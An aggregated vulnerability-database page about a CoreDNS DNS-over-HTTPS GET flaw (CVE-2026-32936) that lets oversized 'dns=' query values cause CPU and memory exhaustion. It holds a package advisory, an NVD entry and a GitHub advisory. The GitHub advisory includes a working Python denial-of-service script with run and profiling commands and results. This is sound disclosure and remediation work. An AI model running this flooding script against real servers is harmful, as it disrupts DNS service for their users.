Security fixes for CVE-2025-13281, CVE-2025-47950, CVE-2025-5187, CVE-2025-58063, CVE-2025-64702, CVE-2025-68151, CVE-2026-26017, CVE-2026-26018, CVE-2026-32934, CVE-2026-32936, CVE-2026-33190, CVE-2026-33489, CVE-2026-33811, CVE-2026-33814, CVE-2026-35579, CVE-2026-39817, CVE-2026-39819, CVE-2026-39820, CVE-2026-39823, CVE-2026-39825, CVE-2026-39826, CVE-2026-39836, CVE-2026-42499, CVE-2026-42501, ghsa-2wpx-qpw2-g5h5, ghsa-4x4m-3c2p-qppc, ghsa-527x-5wrf-22m2, ghsa-63cw-r7xf-jmwr, ghsa-93mf-426m-g6x9, ghsa-c9v3-4pv7-87pr, ghsa-cvx7-x8pj-x2gw, ghsa-g754-hx8w-x2g6, ghsa-h75p-j8xm-m278, ghsa-h8mm-c463-wjq3, ghsa-qhmp-q7xh-99rh, ghsa-r6j8-c6r2-37rr, ghsa-vp29-5652-4fw9 applied in versions: 1.25.0-r2
Details
Multiple security vulnerabilities affect the kubernetes-dns-node-cache package. These issues are resolved in later releases. See references for individual vulnerability details.
References
| URL | Type | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "kubernetes-dns-node-cache"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.25.0-r2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the kubernetes-dns-node-cache package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-VJ54611",
"modified": "2026-05-20T18:52:19Z",
"published": "2026-05-21T08:11:44.432468Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-VJ54611.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-13281"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-47950"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-5187"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-58063"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-64702"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-68151"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26017"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26018"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32934"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32936"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33190"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33489"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33811"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33814"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-35579"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39817"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39819"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39820"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39823"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39825"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39826"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39836"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42499"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42501"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2wpx-qpw2-g5h5"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-4x4m-3c2p-qppc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-527x-5wrf-22m2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-63cw-r7xf-jmwr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-93mf-426m-g6x9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c9v3-4pv7-87pr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-cvx7-x8pj-x2gw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-g754-hx8w-x2g6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-h75p-j8xm-m278"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-h8mm-c463-wjq3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qhmp-q7xh-99rh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r6j8-c6r2-37rr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vp29-5652-4fw9"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13281"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47950"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5187"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58063"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64702"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68151"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26017"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26018"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32934"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32936"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33190"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33489"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33811"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33814"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35579"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39817"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39819"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39820"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39823"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39825"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39826"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39836"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42499"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42501"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2025-13281, CVE-2025-47950, CVE-2025-5187, CVE-2025-58063, CVE-2025-64702, CVE-2025-68151, CVE-2026-26017, CVE-2026-26018, CVE-2026-32934, CVE-2026-32936, CVE-2026-33190, CVE-2026-33489, CVE-2026-33811, CVE-2026-33814, CVE-2026-35579, CVE-2026-39817, CVE-2026-39819, CVE-2026-39820, CVE-2026-39823, CVE-2026-39825, CVE-2026-39826, CVE-2026-39836, CVE-2026-42499, CVE-2026-42501, ghsa-2wpx-qpw2-g5h5, ghsa-4x4m-3c2p-qppc, ghsa-527x-5wrf-22m2, ghsa-63cw-r7xf-jmwr, ghsa-93mf-426m-g6x9, ghsa-c9v3-4pv7-87pr, ghsa-cvx7-x8pj-x2gw, ghsa-g754-hx8w-x2g6, ghsa-h75p-j8xm-m278, ghsa-h8mm-c463-wjq3, ghsa-qhmp-q7xh-99rh, ghsa-r6j8-c6r2-37rr, ghsa-vp29-5652-4fw9 applied in versions: 1.25.0-r2",
"upstream": [
"CVE-2025-13281",
"CVE-2025-47950",
"CVE-2025-5187",
"CVE-2025-58063",
"CVE-2025-64702",
"CVE-2025-68151",
"CVE-2026-26017",
"CVE-2026-26018",
"CVE-2026-32934",
"CVE-2026-32936",
"CVE-2026-33190",
"CVE-2026-33489",
"CVE-2026-33811",
"CVE-2026-33814",
"CVE-2026-35579",
"CVE-2026-39817",
"CVE-2026-39819",
"CVE-2026-39820",
"CVE-2026-39823",
"CVE-2026-39825",
"CVE-2026-39826",
"CVE-2026-39836",
"CVE-2026-42499",
"CVE-2026-42501",
"ghsa-2wpx-qpw2-g5h5",
"ghsa-4x4m-3c2p-qppc",
"ghsa-527x-5wrf-22m2",
"ghsa-63cw-r7xf-jmwr",
"ghsa-93mf-426m-g6x9",
"ghsa-c9v3-4pv7-87pr",
"ghsa-cvx7-x8pj-x2gw",
"ghsa-g754-hx8w-x2g6",
"ghsa-h75p-j8xm-m278",
"ghsa-h8mm-c463-wjq3",
"ghsa-qhmp-q7xh-99rh",
"ghsa-r6j8-c6r2-37rr",
"ghsa-vp29-5652-4fw9"
]
}
FKIE_CVE-2026-32936
Vulnerability from fkie_nvd - Published: 2026-05-05 20:16 - Updated: 2026-05-08 16:02
Severity
Summary
CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the DNS-over-HTTPS (DoH) GET path accepts oversized dns= query parameter values and performs URL query parsing, base64 decoding, and DNS message unpacking before rejecting the request. Unlike the POST path, which applies a bounded read via http.MaxBytesReader limited to 65536 bytes, the GET path has no equivalent size validation before expensive processing. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to force high CPU usage, large transient memory allocations, and elevated garbage-collection pressure, leading to denial of service. This issue has been fixed in version 1.14.3.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/coredns/coredns/releases/tag/v1.14.3 | Release Notes | |
| security-advisories@github.com | https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr | Exploit, Mitigation, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr | Exploit, Mitigation, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| coredns.io | coredns | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:coredns.io:coredns:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0B1F8FE2-314C-4C38-9F18-099ACCFF0AAD",
"versionEndExcluding": "1.14.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the DNS-over-HTTPS (DoH) GET path accepts oversized dns= query parameter values and performs URL query parsing, base64 decoding, and DNS message unpacking before rejecting the request. Unlike the POST path, which applies a bounded read via http.MaxBytesReader limited to 65536 bytes, the GET path has no equivalent size validation before expensive processing. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to force high CPU usage, large transient memory allocations, and elevated garbage-collection pressure, leading to denial of service. This issue has been fixed in version 1.14.3."
}
],
"id": "CVE-2026-32936",
"lastModified": "2026-05-08T16:02:28.993",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-05-05T20:16:36.010",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.3"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-400"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-63CW-R7XF-JMWR
Vulnerability from github – Published: 2026-04-28 22:43 – Updated: 2026-06-12 19:25
VLAI
Summary
CoreDNS DoH GET oversized dns= query parameter causes pre-validation CPU and memory amplification
Details
Summary
CoreDNS's DNS-over-HTTPS (DoH) GET path accepts oversized dns= query values and performs substantial request parsing, query unescaping, base64 decoding, and message unpacking work before returning 400 Bad Request.
A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to /dns-query?dns=... and force high CPU usage, large transient allocations, elevated garbage-collection pressure, and increased resident memory consumption even though the requests are ultimately rejected.
This is a denial-of-service issue caused by expensive pre-validation processing on the DoH GET path.
Details
The vulnerable flow is in plugin/pkg/doh/doh.go:
RequestToMsg()dispatches GET requests torequestToMsgGet():plugin/pkg/doh/doh.go:79-89requestToMsgGet()callsreq.URL.Query(), extractsdns, and passes it directly tobase64ToMsg():plugin/pkg/doh/doh.go:99-108base64ToMsg()decodes the full attacker-controlled value viab64Enc.DecodeString()and only then attempts to unpack it into a DNS message:plugin/pkg/doh/doh.go:121-130
Relevant snippet:
func requestToMsgGet(req *http.Request) (*dns.Msg, error) {
values := req.URL.Query()
b64, ok := values["dns"]
if !ok {
return nil, fmt.Errorf("no 'dns' query parameter found")
}
if len(b64) != 1 {
return nil, fmt.Errorf("multiple 'dns' query values found")
}
return base64ToMsg(b64[0])
}
func base64ToMsg(b64 string) (*dns.Msg, error) {
buf, err := b64Enc.DecodeString(b64)
if err != nil {
return nil, err
}
m := new(dns.Msg)
err = m.Unpack(buf)
return m, err
}
````
By contrast, the POST path applies a bounded read before unpacking:
```go
func toMsg(r io.ReadCloser) (*dns.Msg, error) {
buf, err := io.ReadAll(http.MaxBytesReader(nil, r, 65536))
if err != nil {
return nil, err
}
m := new(dns.Msg)
err = m.Unpack(buf)
return m, err
}
So, POST is explicitly size-bounded, while GET is not equivalently bounded before expensive parsing and decoding work occurs.
In addition, the HTTPS server is created in core/dnsserver/server_https.go:87-92 without an explicit early GET-path size guard in this path:
srv := &http.Server{
ReadTimeout: s.ReadTimeout,
WriteTimeout: s.WriteTimeout,
IdleTimeout: s.IdleTimeout,
ErrorLog: stdlog.New(&loggerAdapter{}, "", 0),
}
As a result, oversized DoH GET request targets are processed through:
- HTTP request-line parsing
- URL query parsing / unescaping
- DoH GET extraction
- base64 decoding
- DNS message unpacking
before the request is rejected.
Root cause
The root cause is missing early size validation on the DoH GET path.
More specifically:
requestToMsgGet()performsreq.URL.Query()on attacker-controlled oversized request targets.- The extracted
dnsvalue is passed tobase64ToMsg()without an encoded-length or decoded-length bound. base64ToMsg()fully decodes the attacker-controlled string before any DNS-size rejection.- The POST path already has an explicit bounded read, but GET does not have an equivalent pre-decode bound.
This creates a pre-validation resource-amplification path for DoH GET.
PoC
Local test setup
I reproduced this locally against CoreDNS 1.14.2 over HTTPS with pprof enabled.
Create a self-signed certificate:
openssl req -x509 -newkey rsa:2048 -sha256 -days 1 -nodes \
-keyout key.pem -out cert.pem \
-subj "/CN=127.0.0.1"
Create this Corefile:
https://127.0.0.1:8443 {
whoami
log
errors
tls cert.pem key.pem
pprof 127.0.0.1:6060
}
Run CoreDNS:
./coredns -conf Corefile
Proof-of-concept script
#!/usr/bin/env python3
import argparse
import base64
import collections
import concurrent.futures
import http.client
import ssl
import time
def send_one(host, port, path, timeout):
ctx = ssl._create_unverified_context()
conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
try:
conn.request("GET", path, headers={
"Accept": "application/dns-message",
"Connection": "close",
})
resp = conn.getresponse()
resp.read()
return resp.status
except Exception as e:
return f"ERR:{type(e).__name__}"
finally:
try:
conn.close()
except Exception:
pass
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--host", default="127.0.0.1")
ap.add_argument("--port", type=int, default=8443)
ap.add_argument("--decoded-kib", type=int, default=720)
ap.add_argument("--workers", type=int, default=64)
ap.add_argument("--requests", type=int, default=5000)
ap.add_argument("--timeout", type=float, default=5.0)
args = ap.parse_args()
raw = b"A" * (args.decoded_kib * 1024)
b64 = base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
path = "/dns-query?dns=" + b64
print(f"[+] target = https://{args.host}:{args.port}")
print(f"[+] decoded bytes = {len(raw):,}")
print(f"[+] encoded chars = {len(b64):,}")
print(f"[+] request-target length = {len(path):,}")
print(f"[+] workers = {args.workers}, requests = {args.requests}")
print("[+] 400 responses are expected; the issue is expensive processing before rejection.\n")
started = time.time()
results = collections.Counter()
with concurrent.futures.ThreadPoolExecutor(max_workers=args.workers) as ex:
futs = [
ex.submit(send_one, args.host, args.port, path, args.timeout)
for _ in range(args.requests)
]
for i, fut in enumerate(concurrent.futures.as_completed(futs), 1):
results[fut.result()] += 1
if i % 10 == 0 or i == args.requests:
print(f"[{i}/{args.requests}] {dict(results)}")
elapsed = time.time() - started
print("\n[+] done")
print(f"[+] elapsed = {elapsed:.2f}s")
print(f"[+] summary = {dict(results)}")
if __name__ == "__main__":
main()
Run the PoC:
python3 poc_doh_get_oversize_https.py \
--host 127.0.0.1 \
--port 8443 \
--decoded-kib 720 \
--workers 64 \
--requests 5000
Profiling commands used during reproduction
CPU profile:
(curl -s "http://127.0.0.1:6060/debug/pprof/profile?seconds=20" -o cpu_attack.pb.gz &) ; \
sleep 1 ; \
python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 ; \
wait
go tool pprof -top ./coredns cpu_attack.pb.gz
Heap / allocation profiles:
curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_before.pb.gz
curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_before.pb.gz
python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000
curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_after.pb.gz
curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_after.pb.gz
go tool pprof -top -base heap_before.pb.gz ./coredns heap_after.pb.gz
go tool pprof -top -base allocs_before.pb.gz ./coredns allocs_after.pb.gz
Reproduction results
I confirmed the issue on:
- CoreDNS 1.14.2
- linux/amd64
- go1.26.1
PoC payload characteristics:
- decoded payload size:
737,280 bytes - base64url-encoded
dnslength:983,040 - request-target length:
983,055
Observed request outcome:
5000 / 5000requests returned400 Bad Request- total runtime for the 5000-request run:
18.22s
The important point is that the requests are rejected only after expensive processing has already happened.
CPU profile highlights
The CPU profile captured during the attack showed significant time in:
net/http.readRequestnet/url.ParseQuery/net/url.QueryUnescape/net/url.unescapegithub.com/coredns/coredns/plugin/pkg/doh.requestToMsgGetgithub.com/coredns/coredns/plugin/pkg/doh.base64ToMsgencoding/base64.(*Encoding).DecodeString- Go GC worker paths
Representative cumulative values from the captured profile included:
github.com/coredns/coredns/core/dnsserver.(*ServerHTTPS).ServeHTTP→10.91sgithub.com/coredns/coredns/plugin/pkg/doh.RequestToMsg→10.88sgithub.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet→10.88sgithub.com/coredns/coredns/plugin/pkg/doh.base64ToMsg→3.50sencoding/base64.(*Encoding).DecodeString→3.46snet/http.readRequest→10.57snet/url.(*URL).Query/ParseQuery/QueryUnescape→7.38sruntime.gcBgMarkWorkerand related GC paths were also heavily active
This demonstrates that the issue is not limited to final DNS unpacking. The oversized GET request forces meaningful work in HTTP parsing, URL handling, base64 decoding, and garbage collection before rejection.
Allocation profile highlights
Allocation profiling showed very large transient allocation volume caused by the rejected requests:
- total
alloc_space:26,756.48 MB
Top contributors included:
net/textproto.(*Reader).readLineSlice→19,668.19 MBnet/textproto.(*Reader).ReadLine→3,738.84 MBencoding/base64.(*Encoding).DecodeString→2,766.16 MB
Within the CoreDNS DoH GET path specifically:
github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg→2,775.67 MBgithub.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet→2,775.67 MBgithub.com/coredns/coredns/plugin/pkg/doh.base64ToMsg→2,773.67 MB
Heap delta (inuse_space) also showed live growth attributable to this path, including:
encoding/base64.(*Encoding).DecodeString→7,629.75 kB
Memory observations
Runtime memory monitoring showed a clear increase in peak resident usage during the attack:
- baseline
VmHWM / VmRSSbefore load was approximately55,864 kB - observed
VmHWMduring testing reached approximately146,100 kB
So even though requests returned 400, the server still experienced substantial transient memory growth and allocator / GC pressure before rejection.
Impact
A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to the HTTPS endpoint and force significant pre-rejection work.
Impact includes:
- elevated CPU consumption
- large transient allocations
- increased garbage-collection pressure
- higher peak resident memory usage
- degraded throughput and responsiveness
- denial of service risk on memory-constrained or heavily loaded deployments
This is especially relevant for internet-facing DoH deployments, where an attacker can repeatedly trigger the GET parsing path without authentication.
The fact that the final HTTP status is 400 Bad Request does not mitigate the issue, because the expensive processing has already occurred before the rejection is generated.
Suggested remediation
A robust fix should address both stages of the problem:
- Apply an early bound on the DoH GET request target / raw query length before expensive query parsing.
- Enforce an encoded-length and decoded-length limit for the
dnsparameter before callingDecodeString(). - Preserve equivalent size constraints across GET and POST paths.
A minimal hardening direction would be:
- reject oversized GET requests before
req.URL.Query()on the DoH path - reject
dnsvalues whose encoded length exceeds the maximum valid DNS message encoding - reject any decoded payload larger than the supported DNS message size before unpacking
Credit request: When referencing, republishing, or issuing downstream advisories for this vulnerability, please preserve the original researcher credit as Ali Firas (thesmartshadow).
Severity
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32936"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-28T22:43:47Z",
"nvd_published_at": "2026-05-05T20:16:36Z",
"severity": "HIGH"
},
"details": "### Summary\n\nCoreDNS\u0027s DNS-over-HTTPS (DoH) GET path accepts oversized `dns=` query values and performs substantial request parsing, query unescaping, base64 decoding, and message unpacking work before returning `400 Bad Request`.\n\nA remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to `/dns-query?dns=...` and force high CPU usage, large transient allocations, elevated garbage-collection pressure, and increased resident memory consumption even though the requests are ultimately rejected.\n\nThis is a denial-of-service issue caused by expensive pre-validation processing on the DoH GET path.\n\n### Details\n\nThe vulnerable flow is in `plugin/pkg/doh/doh.go`:\n\n- `RequestToMsg()` dispatches GET requests to `requestToMsgGet()`:\n - `plugin/pkg/doh/doh.go:79-89`\n- `requestToMsgGet()` calls `req.URL.Query()`, extracts `dns`, and passes it directly to `base64ToMsg()`:\n - `plugin/pkg/doh/doh.go:99-108`\n- `base64ToMsg()` decodes the full attacker-controlled value via `b64Enc.DecodeString()` and only then attempts to unpack it into a DNS message:\n - `plugin/pkg/doh/doh.go:121-130`\n\nRelevant snippet:\n\n```go\nfunc requestToMsgGet(req *http.Request) (*dns.Msg, error) {\n values := req.URL.Query()\n b64, ok := values[\"dns\"]\n if !ok {\n return nil, fmt.Errorf(\"no \u0027dns\u0027 query parameter found\")\n }\n if len(b64) != 1 {\n return nil, fmt.Errorf(\"multiple \u0027dns\u0027 query values found\")\n }\n return base64ToMsg(b64[0])\n}\n\nfunc base64ToMsg(b64 string) (*dns.Msg, error) {\n buf, err := b64Enc.DecodeString(b64)\n if err != nil {\n return nil, err\n }\n\n m := new(dns.Msg)\n err = m.Unpack(buf)\n\n return m, err\n}\n````\n\nBy contrast, the POST path applies a bounded read before unpacking:\n\n```go\nfunc toMsg(r io.ReadCloser) (*dns.Msg, error) {\n buf, err := io.ReadAll(http.MaxBytesReader(nil, r, 65536))\n if err != nil {\n return nil, err\n }\n m := new(dns.Msg)\n err = m.Unpack(buf)\n return m, err\n}\n```\n\nSo, POST is explicitly size-bounded, while GET is not equivalently bounded before expensive parsing and decoding work occurs.\n\nIn addition, the HTTPS server is created in `core/dnsserver/server_https.go:87-92` without an explicit early GET-path size guard in this path:\n\n```go\nsrv := \u0026http.Server{\n ReadTimeout: s.ReadTimeout,\n WriteTimeout: s.WriteTimeout,\n IdleTimeout: s.IdleTimeout,\n ErrorLog: stdlog.New(\u0026loggerAdapter{}, \"\", 0),\n}\n```\n\nAs a result, oversized DoH GET request targets are processed through:\n\n1. HTTP request-line parsing\n2. URL query parsing / unescaping\n3. DoH GET extraction\n4. base64 decoding\n5. DNS message unpacking\n\nbefore the request is rejected.\n\n### Root cause\n\nThe root cause is missing early size validation on the DoH GET path.\n\nMore specifically:\n\n* `requestToMsgGet()` performs `req.URL.Query()` on attacker-controlled oversized request targets.\n* The extracted `dns` value is passed to `base64ToMsg()` without an encoded-length or decoded-length bound.\n* `base64ToMsg()` fully decodes the attacker-controlled string before any DNS-size rejection.\n* The POST path already has an explicit bounded read, but GET does not have an equivalent pre-decode bound.\n\nThis creates a pre-validation resource-amplification path for DoH GET.\n\n### PoC\n\n#### Local test setup\n\nI reproduced this locally against CoreDNS 1.14.2 over HTTPS with `pprof` enabled.\n\nCreate a self-signed certificate:\n\n```bash\nopenssl req -x509 -newkey rsa:2048 -sha256 -days 1 -nodes \\\n -keyout key.pem -out cert.pem \\\n -subj \"/CN=127.0.0.1\"\n```\n\nCreate this `Corefile`:\n\n```txt\nhttps://127.0.0.1:8443 {\n whoami\n log\n errors\n tls cert.pem key.pem\n pprof 127.0.0.1:6060\n}\n```\n\nRun CoreDNS:\n\n```bash\n./coredns -conf Corefile\n```\n\n#### Proof-of-concept script\n\n```python\n#!/usr/bin/env python3\nimport argparse\nimport base64\nimport collections\nimport 